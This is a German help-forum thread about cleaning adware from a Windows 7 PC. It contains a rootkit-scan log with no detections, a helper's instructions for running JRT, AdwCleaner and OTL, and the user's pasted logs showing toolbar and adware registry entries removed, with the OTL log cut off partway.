23:35:48.0100 5440  [ 44E8048ACE47BEFBFDC2E9BE4CBC8880 ] uliagpkx        C:\Windows\system32\drivers\uliagpkx.sys
23:35:48.0100 5440  uliagpkx - ok
23:35:48.0116 5440  [ D295BED4B898F0FD999FCFA9B32B071B ] umbus           C:\Windows\system32\DRIVERS\umbus.sys
23:35:48.0116 5440  umbus - ok
23:35:48.0131 5440  [ 7550AD0C6998BA1CB4843E920EE0FEAC ] UmPass          C:\Windows\system32\DRIVERS\umpass.sys
23:35:48.0131 5440  UmPass - ok
23:35:48.0147 5440  [ 833FBB672460EFCE8011D262175FAD33 ] upnphost        C:\Windows\System32\upnphost.dll
23:35:48.0178 5440  upnphost - ok
23:35:48.0178 5440  [ BD9C55D7023C5DE374507ACC7A14E2AC ] usbccgp         C:\Windows\system32\DRIVERS\usbccgp.sys
23:35:48.0194 5440  usbccgp - ok
23:35:48.0194 5440  [ 04EC7CEC62EC3B6D9354EEE93327FC82 ] usbcir          C:\Windows\system32\drivers\usbcir.sys
23:35:48.0209 5440  usbcir - ok
23:35:48.0209 5440  [ F92DE757E4B7CE9C07C5E65423F3AE3B ] usbehci         C:\Windows\system32\drivers\usbehci.sys
23:35:48.0225 5440  usbehci - ok
23:35:48.0225 5440  [ 8DC94AEC6A7E644A06135AE7506DC2E9 ] usbhub          C:\Windows\system32\DRIVERS\usbhub.sys
23:35:48.0240 5440  usbhub - ok
23:35:48.0240 5440  [ E185D44FAC515A18D9DEDDC23C2CDF44 ] usbohci         C:\Windows\system32\drivers\usbohci.sys
23:35:48.0256 5440  usbohci - ok
23:35:48.0256 5440  [ 797D862FE0875E75C7CC4C1AD7B30252 ] usbprint        C:\Windows\system32\DRIVERS\usbprint.sys
23:35:48.0272 5440  usbprint - ok
23:35:48.0272 5440  [ 576096CCBC07E7C4EA4F5E6686D6888F ] usbscan         C:\Windows\system32\DRIVERS\usbscan.sys
23:35:48.0287 5440  usbscan - ok
23:35:48.0303 5440  [ F991AB9CC6B908DB552166768176896A ] USBSTOR         C:\Windows\system32\DRIVERS\USBSTOR.SYS
23:35:48.0318 5440  USBSTOR - ok
23:35:48.0318 5440  [ 68DF884CF41CDADA664BEB01DAF67E3D ] usbuhci         C:\Windows\system32\drivers\usbuhci.sys
23:35:48.0334 5440  usbuhci - ok
23:35:48.0334 5440  [ 45F4E7BF43DB40A6C6B4D92C76CBC3F2 ] usbvideo        C:\Windows\System32\Drivers\usbvideo.sys
23:35:48.0350 5440  usbvideo - ok
23:35:48.0350 5440  [ AF77716205C97E902E6C5B78DECE2CCA ] usb_rndisx      C:\Windows\system32\DRIVERS\usb8023x.sys
23:35:48.0365 5440  usb_rndisx - ok
23:35:48.0365 5440  [ 081E6E1C91AEC36758902A9F727CD23C ] UxSms           C:\Windows\System32\uxsms.dll
23:35:48.0396 5440  UxSms - ok
23:35:48.0396 5440  [ 81951F51E318AECC2D68559E47485CC4 ] VaultSvc        C:\Windows\system32\lsass.exe
23:35:48.0412 5440  VaultSvc - ok
23:35:48.0412 5440  [ A059C4C3EDB09E07D21A8E5C0AABD3CB ] vdrvroot        C:\Windows\system32\drivers\vdrvroot.sys
23:35:48.0428 5440  vdrvroot - ok
23:35:48.0428 5440  [ C3CD30495687C2A2F66A65CA6FD89BE9 ] vds             C:\Windows\System32\vds.exe
23:35:48.0459 5440  vds - ok
23:35:48.0474 5440  [ 17C408214EA61696CEC9C66E388B14F3 ] vga             C:\Windows\system32\DRIVERS\vgapnp.sys
23:35:48.0490 5440  vga - ok
23:35:48.0490 5440  [ 8E38096AD5C8570A6F1570A61E251561 ] VgaSave         C:\Windows\System32\drivers\vga.sys
23:35:48.0521 5440  VgaSave - ok
23:35:48.0521 5440  [ 5461686CCA2FDA57B024547733AB42E3 ] vhdmp           C:\Windows\system32\drivers\vhdmp.sys
23:35:48.0537 5440  vhdmp - ok
23:35:48.0537 5440  [ C829317A37B4BEA8F39735D4B076E923 ] viaagp          C:\Windows\system32\drivers\viaagp.sys
23:35:48.0552 5440  viaagp - ok
23:35:48.0552 5440  [ E02F079A6AA107F06B16549C6E5C7B74 ] ViaC7           C:\Windows\system32\DRIVERS\viac7.sys
23:35:48.0568 5440  ViaC7 - ok
23:35:48.0568 5440  [ E43574F6A56A0EE11809B48C09E4FD3C ] viaide          C:\Windows\system32\drivers\viaide.sys
23:35:48.0584 5440  viaide - ok
23:35:48.0584 5440  [ 4C63E00F2F4B5F86AB48A58CD990F212 ] volmgr          C:\Windows\system32\drivers\volmgr.sys
23:35:48.0599 5440  volmgr - ok
23:35:48.0599 5440  [ B5BB72067DDDDBBFB04B2F89FF8C3C87 ] volmgrx         C:\Windows\system32\drivers\volmgrx.sys
23:35:48.0615 5440  volmgrx - ok
23:35:48.0615 5440  [ F497F67932C6FA693D7DE2780631CFE7 ] volsnap         C:\Windows\system32\drivers\volsnap.sys
23:35:48.0630 5440  volsnap - ok
23:35:48.0646 5440  [ 9DFA0CC2F8855A04816729651175B631 ] vsmraid         C:\Windows\system32\DRIVERS\vsmraid.sys
23:35:48.0646 5440  vsmraid - ok
23:35:48.0662 5440  [ 209A3B1901B83AEB8527ED211CCE9E4C ] VSS             C:\Windows\system32\vssvc.exe
23:35:48.0708 5440  VSS - ok
23:35:48.0708 5440  [ 90567B1E658001E79D7C8BBD3DDE5AA6 ] vwifibus        C:\Windows\system32\DRIVERS\vwifibus.sys
23:35:48.0724 5440  vwifibus - ok
23:35:48.0724 5440  [ 7090D3436EEB4E7DA3373090A23448F7 ] vwififlt        C:\Windows\system32\DRIVERS\vwififlt.sys
23:35:48.0740 5440  vwififlt - ok
23:35:48.0740 5440  [ 55187FD710E27D5095D10A472C8BAF1C ] W32Time         C:\Windows\system32\w32time.dll
23:35:48.0771 5440  W32Time - ok
23:35:48.0786 5440  [ DE3721E89C653AA281428C8A69745D90 ] WacomPen        C:\Windows\system32\DRIVERS\wacompen.sys
23:35:48.0802 5440  WacomPen - ok
23:35:48.0802 5440  [ 3C3C78515F5AB448B022BDF5B8FFDD2E ] WANARP          C:\Windows\system32\DRIVERS\wanarp.sys
23:35:48.0833 5440  WANARP - ok
23:35:48.0833 5440  [ 3C3C78515F5AB448B022BDF5B8FFDD2E ] Wanarpv6        C:\Windows\system32\DRIVERS\wanarp.sys
23:35:48.0849 5440  Wanarpv6 - ok
23:35:48.0880 5440  [ 353A04C273EC58475D8633E75CCD5604 ] WatAdminSvc     C:\Windows\system32\Wat\WatAdminSvc.exe
23:35:48.0911 5440  WatAdminSvc - ok
23:35:48.0927 5440  [ 691E3285E53DCA558E1A84667F13E15A ] wbengine        C:\Windows\system32\wbengine.exe
23:35:48.0958 5440  wbengine - ok
23:35:48.0958 5440  [ 9614B5D29DC76AC3C29F6D2D3AA70E67 ] WbioSrvc        C:\Windows\System32\wbiosrvc.dll
23:35:48.0989 5440  WbioSrvc - ok
23:35:48.0989 5440  [ 34EEE0DFAADB4F691D6D5308A51315DC ] wcncsvc         C:\Windows\System32\wcncsvc.dll
23:35:49.0005 5440  wcncsvc - ok
23:35:49.0020 5440  [ 5D930B6357A6D2AF4D7653BDABBF352F ] WcsPlugInService C:\Windows\System32\WcsPlugInService.dll
23:35:49.0036 5440  WcsPlugInService - ok
23:35:49.0036 5440  [ 1112A9BADACB47B7C0BB0392E3158DFF ] Wd              C:\Windows\system32\DRIVERS\wd.sys
23:35:49.0052 5440  Wd - ok
23:35:49.0052 5440  [ A840213F1ACDCC175B4D1D5AAEAC0D7A ] Wdf01000        C:\Windows\system32\drivers\Wdf01000.sys
23:35:49.0083 5440  Wdf01000 - ok
23:35:49.0083 5440  [ 46EF9DC96265FD0B423DB72E7C38C2A5 ] WdiServiceHost  C:\Windows\system32\wdi.dll
23:35:49.0114 5440  WdiServiceHost - ok
23:35:49.0130 5440  [ 46EF9DC96265FD0B423DB72E7C38C2A5 ] WdiSystemHost   C:\Windows\system32\wdi.dll
23:35:49.0145 5440  WdiSystemHost - ok
23:35:49.0145 5440  [ A9D880F97530D5B8FEE278923349929D ] WebClient       C:\Windows\System32\webclnt.dll
23:35:49.0161 5440  WebClient - ok
23:35:49.0176 5440  [ 760F0AFE937A77CFF27153206534F275 ] Wecsvc          C:\Windows\system32\wecsvc.dll
23:35:49.0208 5440  Wecsvc - ok
23:35:49.0208 5440  [ AC804569BB2364FB6017370258A4091B ] wercplsupport   C:\Windows\System32\wercplsupport.dll
23:35:49.0239 5440  wercplsupport - ok
23:35:49.0239 5440  [ 08E420D873E4FD85241EE2421B02C4A4 ] WerSvc          C:\Windows\System32\WerSvc.dll
23:35:49.0270 5440  WerSvc - ok
23:35:49.0270 5440  [ 8B9A943F3B53861F2BFAF6C186168F79 ] WfpLwf          C:\Windows\system32\DRIVERS\wfplwf.sys
23:35:49.0301 5440  WfpLwf - ok
23:35:49.0301 5440  [ 5CF95B35E59E2A38023836FFF31BE64C ] WIMMount        C:\Windows\system32\drivers\wimmount.sys
23:35:49.0317 5440  WIMMount - ok
23:35:49.0317 5440  [ 3FAE8F94296001C32EAB62CD7D82E0FD ] WinDefend       C:\Program Files\Windows Defender\mpsvc.dll
23:35:49.0348 5440  WinDefend - ok
23:35:49.0348 5440  WinHttpAutoProxySvc - ok
23:35:49.0364 5440  [ F62E510B6AD4C21EB9FE8668ED251826 ] Winmgmt         C:\Windows\system32\wbem\WMIsvc.dll
23:35:49.0379 5440  Winmgmt - ok
23:35:49.0395 5440  [ 1B91CD34EA3A90AB6A4EF0550174F4CC ] WinRM           C:\Windows\system32\WsmSvc.dll
23:35:49.0442 5440  WinRM - ok
23:35:49.0442 5440  [ A67E5F9A400F3BD1BE3D80613B45F708 ] WinUsb          C:\Windows\system32\DRIVERS\WinUsb.sys
23:35:49.0457 5440  WinUsb - ok
23:35:49.0473 5440  [ 16935C98FF639D185086A3529B1F2067 ] Wlansvc         C:\Windows\System32\wlansvc.dll
23:35:49.0504 5440  Wlansvc - ok
23:35:49.0520 5440  [ FB01D4AE207B9EFDBABFC55DC95C7E31 ] wlidsvc         C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
23:35:49.0566 5440  wlidsvc - ok
23:35:49.0566 5440  [ 0217679B8FCA58714C3BF2726D2CA84E ] WmiAcpi         C:\Windows\system32\drivers\wmiacpi.sys
23:35:49.0582 5440  WmiAcpi - ok
23:35:49.0582 5440  [ 6EB6B66517B048D87DC1856DDF1F4C3F ] wmiApSrv        C:\Windows\system32\wbem\WmiApSrv.exe
23:35:49.0598 5440  wmiApSrv - ok
23:35:49.0613 5440  [ 3B40D3A61AA8C21B88AE57C58AB3122E ] WMPNetworkSvc   C:\Program Files\Windows Media Player\wmpnetwk.exe
23:35:49.0644 5440  WMPNetworkSvc - ok
23:35:49.0644 5440  [ A2F0EC770A92F2B3F9DE6D518E11409C ] WPCSvc          C:\Windows\System32\wpcsvc.dll
23:35:49.0660 5440  WPCSvc - ok
23:35:49.0676 5440  [ AA53356D60AF47EACC85BC617A4F3F66 ] WPDBusEnum      C:\Windows\system32\wpdbusenum.dll
23:35:49.0691 5440  WPDBusEnum - ok
23:35:49.0691 5440  [ 6DB3276587B853BF886B69528FDB048C ] ws2ifsl         C:\Windows\system32\drivers\ws2ifsl.sys
23:35:49.0722 5440  ws2ifsl - ok
23:35:49.0722 5440  [ 6F5D49EFE0E7164E03AE773A3FE25340 ] wscsvc          C:\Windows\System32\wscsvc.dll
23:35:49.0738 5440  wscsvc - ok
23:35:49.0738 5440  WSearch - ok
23:35:49.0769 5440  [ FC3EC24FCE372C89423E015A2AC1A31E ] wuauserv        C:\Windows\system32\wuaueng.dll
23:35:49.0816 5440  wuauserv - ok
23:35:49.0816 5440  [ 06E6F32C8D0A3F66D956F57B43A2E070 ] WudfPf          C:\Windows\system32\drivers\WudfPf.sys
23:35:49.0832 5440  WudfPf - ok
23:35:49.0847 5440  [ 867C301E8B790040AE9CF6486E8041DF ] WUDFRd          C:\Windows\system32\DRIVERS\WUDFRd.sys
23:35:49.0847 5440  WUDFRd - ok
23:35:49.0863 5440  [ FE47B7BC8EA320C2D9B5E5BF6E303765 ] wudfsvc         C:\Windows\System32\WUDFSvc.dll
23:35:49.0878 5440  wudfsvc - ok
23:35:49.0878 5440  [ FF2D745B560F7C71B31F30F4D49F73D2 ] WwanSvc         C:\Windows\System32\wwansvc.dll
23:35:49.0894 5440  WwanSvc - ok
23:35:49.0910 5440  ================ Scan global ===============================
23:35:49.0910 5440  [ DAB748AE0439955ED2FA22357533DDDB ] C:\Windows\system32\basesrv.dll
23:35:49.0910 5440  [ 1F5F07091D50244F17DD8D5147A628CC ] C:\Windows\system32\winsrv.dll
23:35:49.0925 5440  [ 1F5F07091D50244F17DD8D5147A628CC ] C:\Windows\system32\winsrv.dll
23:35:49.0925 5440  [ 364455805E64882844EE9ACB72522830 ] C:\Windows\system32\sxssrv.dll
23:35:49.0925 5440  [ 5F1B6A9C35D3D5CA72D6D6FDEF9747D6 ] C:\Windows\system32\services.exe
23:35:49.0941 5440  [Global] - ok
23:35:49.0941 5440  ================ Scan MBR ==================================
23:35:49.0941 5440  [ A36C5E4F47E84449FF07ED3517B43A31 ] \Device\Harddisk0\DR0
23:35:50.0003 5440  \Device\Harddisk0\DR0 - ok
23:35:50.0003 5440  ================ Scan VBR ==================================
23:35:50.0003 5440  [ 63DB8C16070EC322D1B9F5A883FD3044 ] \Device\Harddisk0\DR0\Partition1
23:35:50.0019 5440  \Device\Harddisk0\DR0\Partition1 - ok
23:35:50.0019 5440  ============================================================
23:35:50.0019 5440  Scan finished
23:35:50.0019 5440  ============================================================
23:35:50.0019 4076  Detected object count: 0
23:35:50.0019 4076  Actual detected object count: 0
23:36:05.0510 5464  Deinitialize success

cosinus · 24.05.2013, 23:13

ok, alles sehr unauffällig

JRT - Junkware Removal Tool

Beende bitte Deine Schutzsoftware um eventuelle Konflikte zu vermeiden.
Bitte lade Junkware Removal Tool auf Deinen Desktop

Starte das Tool mit Doppelklick. Ab Windows Vista (oder höher) bitte mit Rechtsklick "als Administrator ausführen" starten.
Drücke eine beliebige Taste, um das Tool zu starten.
Je nach System kann der Scan eine Weile dauern.
Wenn das Tool fertig ist wird das Logfile (JRT.txt) auf dem Desktop gespeichert und automatisch geöffnet.
Bitte poste den Inhalt der JRT.txt in Deiner nächsten Antwort.

Im Anschluss:

adwCleaner - Toolbars und ungewollte Start-/Suchseiten entfernen

Downloade Dir bitte

AdwCleaner auf deinen Desktop.

Schließe alle offenen Programme und Browser. Bebilderte Anleitung zu AdwCleaner.
Starte die AdwCleaner.exe mit einem Doppelklick.
Stimme den Nutzungsbedingungen zu.
Klicke auf Optionen und vergewissere dich, dass die folgenden Punkte ausgewählt sind:
- "Tracing" Schlüssel löschen
- Winsock Einstellungen zurücksetzen
- Proxy Einstellungen zurücksetzen
- Internet Explorer Richtlinien zurücksetzen
- Chrome Richtlinien zurücksetzen
- Stelle sicher, dass alle 5 Optionen wie hier dargestellt, ausgewählt sind
Klicke auf Suchlauf und warte bis dieser abgeschlossen ist.
Klicke nun auf Löschen und bestätige auftretende Hinweise mit Ok.
Dein Rechner wird automatisch neu gestartet. Nach dem Neustart öffnet sich eine Textdatei. Poste mir deren Inhalt mit deiner nächsten Antwort.
Die Logdatei findest du auch unter C:\AdwCleaner\AdwCleaner[Cx].txt. (x = fortlaufende Nummer).

Danach eine Kontrolle mit OTL bitte:

Doppelklick auf die OTL.exe
Vista User: Rechtsklick auf die OTL.exe und "als Administrator ausführen" wählen
Setze oben mittig den Haken bei Scanne alle Benutzer
Oben findest Du ein Kästchen mit Output. Wähle bitte Minimal Output
Unter Extra Registry, wähle bitte Use SafeList
Klicke nun auf Run Scan links oben
Wenn der Scan beendet wurde werden 2 Logfiles erstellt
Poste die Logfiles in CODE-Tags hier in den Thread.

MA2413 · 25.05.2013, 08:31

JRT Logfile:

Code:

ATTFilter

 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 4.9.4 (05.06.2013:1)
OS: Windows 7 Home Premium x86
Ran by *** on 25.05.2013 at  9:08:13,01
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




~~~ Services



~~~ Registry Values



~~~ Registry Keys

Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\conduit
Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\softonic



~~~ Files



~~~ Folders

Successfully deleted: [Folder] "C:\ProgramData\boost_interprocess"



~~~ FireFox

Successfully deleted: [Registry Value] HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\Extensions\\{ACAA314B-EEBA-48E4-AD47-84E31C44796C}
Emptied folder: C:\Users\***\AppData\Roaming\mozilla\firefox\profiles\hzatt3of.default\minidumps [33 files]



~~~ Event Viewer Logs were cleared





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 25.05.2013 at  9:08:57,75
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--- --- ---

Code:

ATTFilter

# AdwCleaner v2.301 - Datei am 25/05/2013 um 09:12:11 erstellt
# Aktualisiert am 16/05/2013 von Xplode
# Betriebssystem : Windows 7 Home Premium Service Pack 1 (32 bits)
# Benutzer : *** - ***
# Bootmodus : Normal
# Ausgeführt unter : C:\Users\***\Desktop\adwcleaner.exe
# Option [Löschen]


**** [Dienste] ****


***** [Dateien / Ordner] *****

Ordner Gelöscht : C:\Program Files\Common Files\DVDVideoSoft\TB

***** [Registrierungsdatenbank] *****

Schlüssel Gelöscht : HKCU\Software\Ask.com.tmp
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\grusskartencenter.com
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\EscDomains\grusskartencenter.com
Schlüssel Gelöscht : HKCU\Software\YahooPartnerToolbar
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{03E2A1F3-4402-4121-8B35-733216D61217}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{9E3B11F6-4179-4603-A71B-A55F4BCB0BEC}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{9C049BA6-EA47-4AC3-AED6-A66D8DC9E1D8}

***** [Internet Browser] *****

-\\ Internet Explorer v10.0.9200.16537

[OK] Die Registrierungsdatenbank ist sauber.

-\\ Mozilla Firefox v20.0.1 (en-US)

Datei : C:\Users\***\AppData\Roaming\Mozilla\Firefox\Profiles\hzatt3of.default\prefs.js

[OK] Die Datei ist sauber.

-\\ Opera v12.15.1748.0

Datei : C:\Users\***\AppData\Roaming\Opera\Opera\operaprefs.ini

[OK] Die Datei ist sauber.

*************************

AdwCleaner[R1].txt - [1799 octets] - [25/05/2013 09:11:06]
AdwCleaner[S1].txt - [1732 octets] - [25/05/2013 09:12:11]

########## EOF - C:\AdwCleaner[S1].txt - [1792 octets] ##########

OTL Logfile:

Code:

ATTFilter

OTL logfile created on: 25.05.2013 09:15:39 - Run 4
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\***\Desktop
 Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.10.9200.16540)
Locale: 00000c07 | Country: Österreich | Language: DEA | Date Format: dd.MM.yyyy
 
2,68 Gb Total Physical Memory | 1,64 Gb Available Physical Memory | 61,05% Memory free
5,35 Gb Paging File | 4,28 Gb Available in Paging File | 79,85% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files
Drive C: | 100,00 Gb Total Space | 50,04 Gb Free Space | 50,04% Space Free | Partition Type: NTFS
 
Computer Name: *** | User Name: *** | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - C:\Users\***\Desktop\OTL.exe (OldTimer Tools)
PRC - C:\Programme\Opera\opera.exe (Opera Software)
PRC - C:\Windows\System32\conhost.exe (Microsoft Corporation)
PRC - C:\Windows\System32\taskhost.exe (Microsoft Corporation)
PRC - C:\Programme\Spybot - Search & Destroy 2\SDTray.exe (Safer-Networking Ltd.)
PRC - C:\Programme\Spybot - Search & Destroy 2\SDWSCSvc.exe (Safer-Networking Ltd.)
PRC - C:\Programme\Spybot - Search & Destroy 2\SDUpdSvc.exe (Safer-Networking Ltd.)
PRC - C:\Programme\Spybot - Search & Destroy 2\SDFSSvc.exe (Safer-Networking Ltd.)
PRC - C:\Windows\System32\hasplms.exe (SafeNet Inc.)
PRC - C:\Programme\Avira\AntiVir Desktop\avgnt.exe (Avira Operations GmbH & Co. KG)
PRC - C:\Programme\Avira\AntiVir Desktop\avguard.exe (Avira Operations GmbH & Co. KG)
PRC - C:\Programme\Avira\AntiVir Desktop\sched.exe (Avira Operations GmbH & Co. KG)
PRC - C:\Programme\Avira\AntiVir Desktop\avshadow.exe (Avira Operations GmbH & Co. KG)
PRC - C:\Windows\System32\NLSSRV32.EXE (Nalpeiron Ltd.)
PRC - C:\Programme\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE (Microsoft Corp.)
PRC - C:\Programme\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE (Microsoft Corp.)
PRC - C:\Windows\explorer.exe (Microsoft Corporation)
PRC - C:\Programme\Windows Media Player\wmpnetwk.exe (Microsoft Corporation)
PRC - C:\Programme\Dell\QuickSet\quickset.exe (Dell Inc.)
 
 
========== Modules (No Company Name) ==========
 
MOD - C:\Programme\FileZilla FTP Client\fzshellext.dll ()
MOD - C:\Programme\Spybot - Search & Destroy 2\snlFileFormats150.bpl ()
MOD - C:\Programme\Spybot - Search & Destroy 2\snlThirdParty150.bpl ()
MOD - C:\Programme\Spybot - Search & Destroy 2\VirtualTreesDXE150.bpl ()
MOD - C:\Programme\Spybot - Search & Destroy 2\JSDialogPack150.bpl ()
MOD - C:\Programme\Spybot - Search & Destroy 2\DEC150.bpl ()
 
 
========== Services (SafeList) ==========
 
SRV - (SDWSCService) -- C:\Program Files\Spybot File not found
SRV - (SDUpdateService) -- C:\Program Files\Spybot File not found
SRV - (SDScannerService) -- C:\Program Files\Spybot File not found
SRV - (MozillaMaintenance) -- C:\Programme\Mozilla Maintenance Service\maintenanceservice.exe (Mozilla Foundation)
SRV - (AdobeARMservice) -- C:\Programme\Common Files\Adobe\ARM\1.0\armsvc.exe (Adobe Systems Incorporated)
SRV - (hasplms) -- C:\Windows\System32\hasplms.exe (SafeNet Inc.)
SRV - (AntiVirService) -- C:\Programme\Avira\AntiVir Desktop\avguard.exe (Avira Operations GmbH & Co. KG)
SRV - (AntiVirSchedulerService) -- C:\Programme\Avira\AntiVir Desktop\sched.exe (Avira Operations GmbH & Co. KG)
SRV - (FLEXnet Licensing Service) -- C:\Programme\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe (Flexera Software, Inc.)
SRV - (WatAdminSvc) -- C:\Windows\System32\Wat\WatAdminSvc.exe (Microsoft Corporation)
SRV - (nlsX86cc) -- C:\Windows\System32\NLSSRV32.EXE (Nalpeiron Ltd.)
SRV - (wlidsvc) -- C:\Programme\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE (Microsoft Corp.)
SRV - (WMPNetworkSvc) -- C:\Programme\Windows Media Player\wmpnetwk.exe (Microsoft Corporation)
SRV - (osppsvc) -- C:\Programme\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE (Microsoft Corporation)
SRV - (ose) -- C:\Programme\Common Files\microsoft shared\Source Engine\OSE.EXE (Microsoft Corporation)
SRV - (SensrSvc) -- C:\Windows\System32\sensrsvc.dll (Microsoft Corporation)
SRV - (WinDefend) -- C:\Programme\Windows Defender\MpSvc.dll (Microsoft Corporation)
 
 
========== Driver Services (SafeList) ==========
 
DRV - (EagleXNt) -- C:\Windows\system32\drivers\EagleXNt.sys File not found
DRV - (hardlock) -- C:\Windows\System32\drivers\hardlock.sys (SafeNet Inc.)
DRV - (aksfridge) -- C:\Windows\System32\drivers\aksfridge.sys (SafeNet Inc.)
DRV - (avipbb) -- C:\Windows\System32\drivers\avipbb.sys (Avira GmbH)
DRV - (avgntflt) -- C:\Windows\System32\drivers\avgntflt.sys (Avira GmbH)
DRV - (ssudmdm) -- C:\Windows\System32\drivers\ssudmdm.sys (DEVGURU Co., LTD.(www.devguru.co.kr))
DRV - (dg_ssudbus) -- C:\Windows\System32\drivers\ssudbus.sys (DEVGURU Co., LTD.(www.devguru.co.kr))
DRV - (avkmgr) -- C:\Windows\System32\drivers\avkmgr.sys (Avira GmbH)
DRV - (LMouFilt) -- C:\Windows\System32\drivers\LMouFilt.Sys (Logitech, Inc.)
DRV - (LHidFilt) -- C:\Windows\System32\drivers\LHidFilt.Sys (Logitech, Inc.)
DRV - (LUsbFilt) -- C:\Windows\System32\drivers\LUsbFilt.sys (Logitech, Inc.)
DRV - (Impcd) -- C:\Windows\System32\drivers\Impcd.sys (Intel Corporation)
DRV - (ssadmdm) -- C:\Windows\System32\drivers\ssadmdm.sys (MCCI Corporation)
DRV - (ssadbus) -- C:\Windows\System32\drivers\ssadbus.sys (MCCI Corporation)
DRV - (ssadmdfl) -- C:\Windows\System32\drivers\ssadmdfl.sys (MCCI Corporation)
DRV - (rixdpcie) -- C:\Windows\System32\drivers\rixdpe86.sys (REDC)
DRV - (tap0901) -- C:\Windows\System32\drivers\tap0901.sys (The OpenVPN Project)
DRV - (TsUsbFlt) -- C:\Windows\System32\drivers\TsUsbFlt.sys (Microsoft Corporation)
DRV - (WinUsb) -- C:\Windows\System32\drivers\winusb.sys (Microsoft Corporation)
DRV - (NVHDA) -- C:\Windows\System32\drivers\nvhda32v.sys (NVIDIA Corporation)
DRV - (ssmdrv) -- C:\Windows\System32\drivers\ssmdrv.sys (Avira GmbH)
DRV - (nvlddmkm) -- C:\Windows\System32\drivers\nvlddmkm.sys (NVIDIA Corporation)
DRV - (risdpcie) -- C:\Windows\System32\drivers\risdpe86.sys (REDC)
DRV - (rimspci) -- C:\Windows\System32\drivers\rimspe86.sys (REDC)
DRV - (HECI) -- C:\Windows\System32\drivers\HECI.sys (Intel Corporation)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE - HKLM\..\SearchScopes,DefaultScope = 
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
 
 
IE - HKU\.DEFAULT\..\SearchScopes,DefaultScope = 
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
IE - HKU\S-1-5-18\..\SearchScopes,DefaultScope = 
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
IE - HKU\S-1-5-19\..\SearchScopes,DefaultScope = 
 
IE - HKU\S-1-5-20\..\SearchScopes,DefaultScope = 
 
IE - HKU\S-1-5-21-3147314951-3717049883-3254179350-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.at/
IE - HKU\S-1-5-21-3147314951-3717049883-3254179350-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://at.msn.com/?ocid=iehp
IE - HKU\S-1-5-21-3147314951-3717049883-3254179350-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = de-AT
IE - HKU\S-1-5-21-3147314951-3717049883-3254179350-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 29 05 AE 0E 9E E9 CC 01  [binary data]
IE - HKU\S-1-5-21-3147314951-3717049883-3254179350-1000\..\SearchScopes,DefaultScope = 
IE - HKU\S-1-5-21-3147314951-3717049883-3254179350-1000\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE10SR
IE - HKU\S-1-5-21-3147314951-3717049883-3254179350-1000\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = hxxp://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKU\S-1-5-21-3147314951-3717049883-3254179350-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
========== FireFox ==========
 
FF - prefs.js..browser.search.defaultenginename: "Google"
FF - prefs.js..browser.search.selectedEngine: "Google"
FF - prefs.js..browser.startup.homepage: "www.google.at"
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:20.0.1
FF - user.js - File not found
 
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF32_11_7_700_169.dll ()
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=:  File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
